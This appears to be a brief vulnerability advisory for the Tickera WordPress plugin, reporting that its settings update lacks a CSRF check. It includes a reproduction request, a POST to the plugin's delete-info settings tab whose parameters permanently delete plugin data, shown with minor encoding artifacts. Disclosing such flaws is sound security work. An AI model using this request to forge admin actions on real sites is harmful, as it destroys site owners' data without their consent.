The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.
1. Navigate to Tickera Settings » Delete info 2. Delete info request intercept like that POST /wp-admin/edit.php?post_type=tc_events&page;=tc_settings&tab;=tickera_delete_info tc_delete_plugin_data%5Btickera%5D=yes&tc;_delete_selected_data_permanently=Delete+selected+data+permanently